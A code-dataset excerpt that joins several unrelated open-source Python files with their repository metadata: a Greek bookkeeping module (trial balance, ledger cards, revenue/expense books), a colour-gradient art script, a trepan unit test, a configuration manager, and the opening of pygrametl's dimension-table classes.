for lmo in arthro.lmoi:
if lmo not in self.lmoi:
self.lmoi[lmo] = {}
@property
def typoi(self):
typoi = set()
for arthro in self.arthra:
typoi = typoi.union(arthro.typos)
return typoi
def isozygio(self, apo, eos, typos=None):
isoz = {}
for arthro in self.arthra:
if not apo <= arthro.dat <= eos:
continue
if typos and not arthro.is_typos(typos):
continue
for line in arthro.z:
for lmo in line.hierarchy:
isoz[lmo] = isoz.get(lmo, ul.dec(0)) + line.y
return isoz
def isozygio_print(self, apo, eos, typos=None):
isoz = self.isozygio(apo, eos, typos)
tst = '%-20s %-50s %12s'
print('Ισοζύγιο από %s έως %s %s' % (apo, eos, typos or 'ΟΛΑ'))
for lmo in sorted(isoz):
print(tst % (lmo, self.lmoi.get(lmo, lmo), isoz[lmo]))
def kartella(self, lmos, apo, eos):
fdata = []
total = ul.dec(0)
before = ul.dec(0)
after = ul.dec(0)
for arthro in self.arthra:
for line in arthro.z:
if lmos in line.hierarchy:
if arthro.dat < apo:
before += line.y
elif arthro.dat > eos:
after += line.y
else:
total += line.y
fdata.append((arthro.dat, arthro.par, arthro.per,
line.xre, line.pis, total))
return fdata, before, after
def kartella_print(self, lmos, apo, eos):
data, before, after = self.kartella(lmos, apo, eos)
ast = 'Καρτέλλα Λογαριασμού %s %s (Άπό: %s Έως: %s)'
print(ast % (lmos, self.lmoi[lmos], apo, eos))
print('%-139s %12s' % ('Υπόλοιπο από μεταφορά', before))
for dat in data:
# print(len(dat[2]))
print('%-10s %-26s %-75s %12s %12s %12s' % dat)
def fpa(self, apo, eos):
        '''
        1. Select the journal entries (arthra) that involve VAT.
        2. Check whether there is more than one VAT line.
        In the simple case of a single VAT (54.00) line and a single
        1/2/6/7 line, the rate is found by dividing the 54.00 amount by
        the 1/2/6/7 amount; the rate should be one of the known rates
        (13, 24), and the account is then added to the matching category.
        '''
pass
def arthra_print(self, typos=None):
headt = "%-6s %-10s %s %s %s"
lit = " %-12s %-40s %12s %12s"
i = 0
for art in self.arthra:
if typos and typos not in art.typos:
continue
i += 1
print(headt % (i, art.dat, art.par, art.per, art.typos))
for lin in art.z:
print(lit % (lin.lmo, self.lmoi.get(lin.lmo, lin.lmo),
lin.xre, lin.pis))
print('')
def eebook(self):
i = 0
lins = []
for art in self.arthra:
if 'ΕΕ' not in art.typos:
continue
i += 1
poso = ul.dec(0)
fpa = ul.dec(0)
lmo = ''
for line in art.z:
if '54.00' in line.typos:
fpa += ul.dec(line.y * art.ee_synt)
elif '1' in line.typos:
poso += ul.dec(line.xre * art.ee_synt)
elif '2' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '6' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '7' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '3-5' in line.typos:
lmo = line.lmo
else:
pass
lins.append({'aa': i, 'date': art.dat, 'typ': art.ee_typos,
'par': art.par, 'per': art.per, 'poso': poso,
'fpa': fpa, 'tot': art.val, 'lmo': lmo})
return lins
def eebook_print(self, eefile):
afms = pafm.parsefile(eefile)
a5398, _ = parse_afm_5398()
l5398 = []
eedata = self.eebook()
stc = ('{aa:<5}{date} {typ:2} {lmo:12} {par:22} {afm:9} {per:30} {es:12}'
'{esf:12} {est:12} {ej:12} {ejf:12} {ejt:12}')
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
for line in eedata:
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
print(stc.format(**line))
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
print('Esoda : %s Ejoda : %s paroxi: %s' % (te, tj, total_paroxi))
def eebook_myf(self, eefile):
afms = pafm.parsefile(eefile)
a5398, pfpa5398 = parse_afm_5398()
l5398 = []
eedata = self.eebook()
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
lines = []
for line in eedata:
line['mdate'] = date2period(line['date'])
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
if line['afm'] == '1':
line['myft'] = '3cash'
elif line['afm']:
line['myft'] = '1rev'
else:
line['myft'] = ' rev '
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
if line['afm'].strip():
line['myft'] = '2exp'
elif line['lmo'].startswith('53.98.'):
line['myft'] = '4oexp'
else:
line['myft'] = 'exp'
if line['fpa'] != 0:
print('Error', line)
if line['poso'] < 0:
line['decr'] = 'credit'
line['mposo'] = -1 * line['poso']
line['mfpa'] = -1 * line['fpa']
else:
line['decr'] = 'normal'
line['mposo'] = line['poso']
line['mfpa'] = line['fpa']
if line['mfpa'] == 0 and line['lmo'] in pfpa5398:
poso = ul.dec(line['mposo'] / (1 + pfpa5398[line['lmo']]))
fpa = line['mposo'] - poso
line['mposo'] = poso
line['mfpa'] = fpa
lines.append(line)
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
return lines
def myf(self, lines):
pass
def eebook_totals(self, apo, eos):
eedata = self.eebook()
eposo = efpa = xposo = xfpa = ul.dec(0)
for line in eedata:
if not (apo <= line['date'] <= eos):
continue
if line['typ'] == '7':
eposo += line['poso']
efpa += line['fpa']
elif line['typ'] in ('26', '1'):
xposo += line['poso']
xfpa += line['fpa']
else:
print('Error')
print('Σύνολα για περίοδο από %s έως %s' % (apo, eos))
print('Έσοδα : %15s ΦΠΑ: %15s' % (eposo, efpa))
print('Έξοδα : %15s ΦΠΑ: %15s' % (xposo, xfpa))
print('Διαφορά: %15s %15s' % (eposo - xposo, efpa - xfpa))
def __str__(self):
stf = ''
for arthro in self.arthra:
stf += '%s\n' % arthro.__str__()
return stf
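# Illustrative usage sketch (not part of the original module): one balanced
# journal entry loaded into a Book and summarised with isozygio_print().
# The account codes, names and document reference below are made up.
def _example_book():
    lines = [Line('38.00.00', 124, 0),    # cash, debit
             Line('70.00.24', 0, 100),    # sales, credit
             Line('54.00.70', 0, 24)]     # VAT on sales, credit
    arthro = Arthro('2016-05-17', 'TDA25', 'Retail sale', lines)
    book = Book(lmoi={'38.00.00': 'CASH', '70.00.24': 'SALES 24%',
                      '54.00.70': 'VAT ON SALES'},
                arthra=[arthro])
    book.isozygio_print('2016-01-01', '2016-12-31')
    return book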
| gpl-3.0 | -1,884,717,183,715,299,000 | 31.927451 | 84 | 0.450009 | false |
leobrowning92/generative-art | colormap.py | 1 | 3108 | import os
import cairo as cairo
import numpy as np
from render import Animate, Image_Creator
import matplotlib.cm as cm
def random_rgb_color(alpha=1):
return [np.random.uniform(0,1),np.random.uniform(0,1), np.random.uniform(0,1),alpha]
def linear_gradient(start,finish,n=10,alpha=1):
gradient=[0]*n
gradient[0]=start
for i in range(1,n):
gradient[i]=[start[j]+i*(finish[j]-start[j])/float(n) for j in range(3)]+[alpha]
return gradient
def polylinear_gradient(colors,spacing,total_steps,alpha=1):
"""colors is a list of rgb colors, with spacing being the
relative positions of the colors along the gradientself.
spacings are thus sequential numbers between 0 and 1
where the first and last items must be 0 and 1 respectively"""
assert len(colors)==len(spacing), "every color must have a corresponding spacing"
assert total_steps>=2*len(colors) #soft cap on num of colors wrt n
gradient=[]
for i in range(len(colors)-1):
gradient= gradient + linear_gradient(colors[i], colors[i+1], spacing[i+1] -spacing[i],alpha=alpha )
assert len(gradient)==total_steps
return gradient
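# Illustrative sketch (not part of the original file): a ten-step gradient
# running black -> red -> white with the red stop placed at step 5. The
# spacing entries are cumulative step counts, matching how random_colormap()
# builds them with numpy.linspace.
def example_gradient():
    black, red, white = [0, 0, 0, 1], [1, 0, 0, 1], [1, 1, 1, 1]
    return polylinear_gradient([black, red, white], [0, 5, 10], 10)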
def hex_to_rgb(hex):
    return [int(hex[i:i+2], 16) for i in range(1, 6, 2)]  # parse '#rrggbb' as base-16
def random_colormap(number_of_colors,total_steps, even=True,v=True,alpha=1):
colors=[]
spacing=[0]
for i in range(number_of_colors):
colors.append(random_rgb_color(alpha=alpha))
if even:
spacing=np.linspace(0,total_steps,num=number_of_colors,dtype=int)
else:
for i in range(number_of_colors-2):
spacing.append(np.random.uniform(0.01,0.99))
spacing.append(1)
if v:
print("colors:")
for i in colors:
print(*i)
print("spacing:\n", *sorted(spacing))
return polylinear_gradient(colors,sorted(spacing),total_steps,alpha=alpha)
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# These are the required arguments for the Animation
background_color = [1, 1, 1, 1]
image_size = [200,200]
unit=1.0/max(image_size)
total_steps=max(image_size)
#foreground_colors=linear_gradient([.5,0,.5],[1,1,0],n=image_size)
#foreground_colors=random_colormap(3,total_steps,even=False)
colors=np.genfromtxt(fname='sourceimages/IMG_9308_kmean6.dat',skip_header=1,delimiter=',')
foreground_colors=polylinear_gradient(colors,np.linspace(0,total_steps,num=len(colors),dtype=int) ,total_steps)
def step_function(self):
# render.clear_canvas()
self.line([self.steps*unit,0],[self.steps*unit,1],width=unit)
return True
show=True
if show:
# These are the bits that need to be run when calling the Animation
render = Animate(image_size, background_color, foreground_colors, step_function, interval=100, save=False, stop=total_steps)
render.start()
else:
#this is what needs to be run to produce an image without animation
image=Image_Creator(image_size, background_color, foreground_colors, step_function, stop=total_steps)
image.create()
| gpl-3.0 | 146,574,262,081,108,060 | 34.318182 | 132 | 0.67278 | false |
rocky/python2-trepan | test/unit/test-lib-file.py | 1 | 1030 | #!/usr/bin/env python
'Unit test for trepan.lib.file'
import os, stat, sys, tempfile, unittest
from trepan.lib import file as Mfile
class TestLibFile(unittest.TestCase):
def test_lookupmodule(self):
m, f = Mfile.lookupmodule('os.path')
self.assertTrue(f)
self.assertTrue(m)
m, f = Mfile.lookupmodule(__file__)
self.assertTrue(f)
self.assertEqual(None, m)
self.assertEqual((None, None), Mfile.lookupmodule('fafdsafdsa'))
return
if sys.platform != 'win32':
def test_readable(self):
self.assertFalse(Mfile.readable('fdafdsa'))
for mode, can_read in [(stat.S_IRUSR, True),
(stat.S_IWUSR, False)]:
f = tempfile.NamedTemporaryFile()
os.chmod(f.name, mode)
self.assertEqual(can_read, Mfile.readable(f.name))
f.close()
pass
return
pass
pass
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 7,782,893,350,148,697,000 | 27.611111 | 72 | 0.553398 | false |
buxx/synergine | synergine/core/config/ConfigurationManager.py | 1 | 2347 | from synergine.core.exception.NotFoundError import NotFoundError
class ConfigurationManager():
"""
Management of dict based configuration data
"""
def __init__(self, config: dict={}):
self._configs = config
def get(self, config_name: "the.config.name", default=None):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif default is not None:
return default
else:
                raise NotFoundError('Config "'+config_name+'" not found')
return config
def update_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
inception_count = 0
parent_config = self._configs
config = self._configs
for inception in inceptions:
inception_count += 1
if inception in config:
parent_config = config
config = config[inception]
else:
                raise Exception('Config "'+config_name+'" not found')
parent_config[inception] = config_value
def set_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif inceptions.index(inception)+1 == len(inceptions):
config[inception] = config_value
else:
config[inception] = {inceptions.__getitem__(inceptions.index(inception)+1): {}}
config = config[inception]
def load(self, config_to_load):
self._configs = self._merge(self._configs, config_to_load)
def _merge(self, a, b, path=None):
"merges b into a"
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
self._merge(a[key], b[key], path + [str(key)])
elif a[key] == b[key]:
pass
else:
a[key] = b[key]
else:
a[key] = b[key]
return a | apache-2.0 | -4,210,175,498,560,973,300 | 34.044776 | 95 | 0.536003 | false |
jpercent/pygrametl | pygrametl/tables.py | 1 | 122529 | """This module contains classes for looking up rows, inserting rows
and updating rows in dimensions and fact tables. Rows are represented
as dictionaries mapping between attribute names and attribute values.
Many of the class methods take an optional 'namemapping' argument which is
explained here, but not repeated in the documentation for the individual
methods: Consider a method m which is given a row r and a namemapping n.
Assume that the method m uses the attribute a in r (i.e., r[a]). If the
attribute a is not in the namemapping, m will just use r[a] as expected.
But if the attribute a is in the namemapping, the name a is mapped to
another name and the other name is used. That means that m then uses
r[n[a]]. This is practical if attribute names in the considered rows and
DW tables differ. If, for example, data is inserted into an order dimension
in the DW that has the attribute order_date, but the source data uses the
attribute name date, we can use a name mapping from order_date to date:
dim.insert(row=..., namemapping={'order_date':'date'})
"""
# Copyright (c) 2009-2015, Aalborg University ([email protected])
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import locale
from subprocess import Popen, PIPE
from sys import version_info
import tempfile
from time import sleep
import types
import pygrametl
from pygrametl.FIFODict import FIFODict
import pygrametl.parallel
try:
from functools import reduce
except ImportError:
# Jython 2.5.X specific code
pass
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.4.0a'
__all__ = ['Dimension', 'CachedDimension', 'BulkDimension',
'CachedBulkDimension', 'TypeOneSlowlyChangingDimension',
'SlowlyChangingDimension', 'SnowflakedDimension', 'FactTable',
'BatchFactTable', 'BulkFactTable', 'SubprocessFactTable',
'DecoupledDimension', 'DecoupledFactTable', 'BasePartitioner',
'DimensionPartitioner', 'FactTablePartitioner']
class Dimension(object):
"""A class for accessing a dimension. Does no caching."""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
          a dimension member. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
if not type(key) in pygrametl._stringtypes:
raise ValueError("Key argument must be a string")
if not len(attributes):
raise ValueError("No attributes given")
if targetconnection is None:
targetconnection = pygrametl.getdefaulttargetconnection()
if targetconnection is None:
raise ValueError("No target connection available")
self.targetconnection = targetconnection
self.name = name
self.attributes = attributes
self.key = key
self.all = [key, ]
self.all.extend(attributes)
if lookupatts == ():
lookupatts = attributes
elif not len(lookupatts):
raise ValueError("Lookupatts contain no attributes")
elif not set(lookupatts) <= set(self.all):
raise ValueError("Lookupatts is not a subset of attributes")
self.lookupatts = lookupatts
self.defaultidvalue = defaultidvalue
self.rowexpander = rowexpander
pygrametl._alltables.append(self)
# Now create the SQL that we will need...
# This gives "SELECT key FROM name WHERE lookupval1 = %(lookupval1)s
# AND lookupval2 = %(lookupval2)s AND ..."
self.keylookupsql = "SELECT " + key + " FROM " + name + " WHERE " + \
" AND ".join(["%s = %%(%s)s" % (lv, lv) for lv in lookupatts])
# This gives "SELECT key, att1, att2, ... FROM NAME WHERE key =
# %(key)s"
self.rowlookupsql = "SELECT " + ", ".join(self.all) + \
" FROM %s WHERE %s = %%(%s)s" % (name, key, key)
# This gives "INSERT INTO name(key, att1, att2, ...)
# VALUES (%(key)s, %(att1)s, %(att2)s, ...)"
self.insertsql = "INSERT INTO " + name + "(%s" % (key,) + \
(attributes and ", " or "") + \
", ".join(attributes) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
if idfinder is not None:
self.idfinder = idfinder
else:
self.targetconnection.execute("SELECT MAX(%s) FROM %s" %
(key, name))
self.__maxid = self.targetconnection.fetchonetuple()[0]
if self.__maxid is None:
self.__maxid = 0
self.idfinder = self._getnextid
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_lookup(row, namemapping)
if key is not None:
return key
self.targetconnection.execute(self.keylookupsql, row, namemapping)
keyvalue = self.targetconnection.fetchonetuple()[0]
if keyvalue is None:
keyvalue = self.defaultidvalue # most likely also None...
self._after_lookup(row, namemapping, keyvalue)
return keyvalue
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
self.targetconnection.execute(self.rowlookupsql, {self.key: keyvalue})
row = self.targetconnection.fetchone(self.all)
self._after_getbykey(keyvalue, row)
return row
def _before_getbykey(self, keyvalue):
return None
def _after_getbykey(self, keyvalue, resultrow):
pass
def getbyvals(self, values, namemapping={}):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
# select all attributes from the table. The attributes available from
# the values dict are used in the WHERE clause.
attstouse = [a for a in self.attributes
if a in values or a in namemapping]
sql = "SELECT " + ", ".join(self.all) + " FROM " + self.name + \
" WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(sql, values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.all)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping):
return None
def _after_getbyvals(self, values, namemapping, resultrows):
pass
def update(self, row, namemapping={}):
"""Update a single row in the dimension table.
Arguments:
- row: a dict which must contain the key for the dimension.
The row with this key value is updated such that it takes
the value of row[att] for each attribute att which is also in
row.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res:
return
if self.key not in row:
raise KeyError("The key value (%s) is missing in the row" %
(self.key,))
attstouse = [a for a in self.attributes
if a in row or a in namemapping]
if not attstouse:
# Only the key was there - there are no attributes to update
return
sql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % (att, att) for att in attstouse]) + \
" WHERE %s = %%(%s)s" % (self.key, self.key)
self.targetconnection.execute(sql, row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given row. If that fails, insert it. Return the key value.
If the lookup fails and a rowexpander was set when creating the
instance, this rowexpander is called before the insert takes place.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if res is not None and res != self.defaultidvalue:
return res
else:
if self.rowexpander:
row = self.rowexpander(row, namemapping)
return self.insert(row, namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def _getnextid(self, ignoredrow, ignoredmapping):
self.__maxid += 1
return self.__maxid
def endload(self):
"""Finalize the load."""
pass
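# Illustrative sketch (not part of the module): how a Dimension is typically
# wired up and used together with a namemapping, cf. the module docstring.
# The table layout and the wrapped PEP 249 connection below are hypothetical.
def _dimension_usage_sketch(pep249connection):
    conn = pygrametl.ConnectionWrapper(connection=pep249connection)
    productdim = Dimension(name='product', key='productid',
                           attributes=['name', 'category'],
                           lookupatts=['name'],
                           targetconnection=conn)
    # The source row calls the attribute 'title' while the table calls it
    # 'name', so a namemapping translates between the two on lookup/insert.
    srcrow = {'title': 'Alpha', 'category': 'books'}
    return productdim.ensure(srcrow, namemapping={'name': 'title'})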
class CachedDimension(Dimension):
"""A class for accessing a dimension. Does caching.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
size=10000, prefill=False, cachefullrows=False,
cacheoninsert=True, usefetchfirst=False,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- size: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- cacheoninsert: a flag deciding if the cache should be updated
when insertions are done. Default: True
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefill is True. Depending on the used DBMS
and DB driver, this can give significant savings with respect to
time and memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
targetconnection=targetconnection)
self.cacheoninsert = cacheoninsert
self.__prefill = prefill
self.__size = size
if size > 0:
if cachefullrows:
self.__key2row = FIFODict(size)
self.__vals2key = FIFODict(size)
else:
# Use dictionaries as unlimited caches
if cachefullrows:
self.__key2row = {}
self.__vals2key = {}
self.cachefullrows = cachefullrows
if prefill:
if cachefullrows:
positions = tuple([self.all.index(att)
for att in self.lookupatts])
# select the key and all attributes
sql = "SELECT %s FROM %s" % (", ".join(self.all), name)
else:
# select the key and the lookup attributes
sql = "SELECT %s FROM %s" % \
(", ".join([key] + [l for l in self.lookupatts]), name)
positions = range(1, len(self.lookupatts) + 1)
if size > 0 and usefetchfirst:
sql += " FETCH FIRST %d ROWS ONLY" % size
self.targetconnection.execute(sql)
if size <= 0:
data = self.targetconnection.fetchalltuples()
else:
data = self.targetconnection.fetchmanytuples(size)
for rawrow in data:
if cachefullrows:
self.__key2row[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.__vals2key[t] = rawrow[0]
def lookup(self, row, namemapping={}):
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached. We don't have to look in the DB
res = self._before_lookup(row, namemapping)
if res is not None:
return res
else:
return self.defaultidvalue
else:
# Something is not cached so we have to use the classical lookup.
# (We may still benefit from the cache due to a call of
# _before_lookup)
return Dimension.lookup(self, row, namemapping)
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.__vals2key.get(searchtuple, None)
def _after_lookup(self, row, namemapping, resultkey):
if resultkey is not None and (self.defaultidvalue is None or
resultkey != self.defaultidvalue):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.__vals2key[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.cachefullrows:
res = self.__key2row.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.cachefullrows and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.__key2row[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if ((att in namemapping and
namemapping[att] in row) or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.__vals2key:
del self.__vals2key[searchtuple]
break
if self.cachefullrows:
if row[key] in self.__key2row:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.__key2row[row[key]]
return None
def _after_update(self, row, namemapping):
""" """
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached and we sometimes avoid looking in the DB.
# Therefore, we have to update the cache now. In _before_update,
# we deleted the cached data.
keyval = row[(namemapping.get(self.key) or self.key)]
newrow = self.getbykey(keyval) # This also updates __key2row
self._after_lookup(newrow, {}, keyval) # Updates __vals2key
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look the row up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
if self.cacheoninsert:
self._after_lookup(row, namemapping, newkeyvalue)
if self.cachefullrows:
tmp = pygrametl.project(self.all, row, namemapping)
tmp[self.key] = newkeyvalue
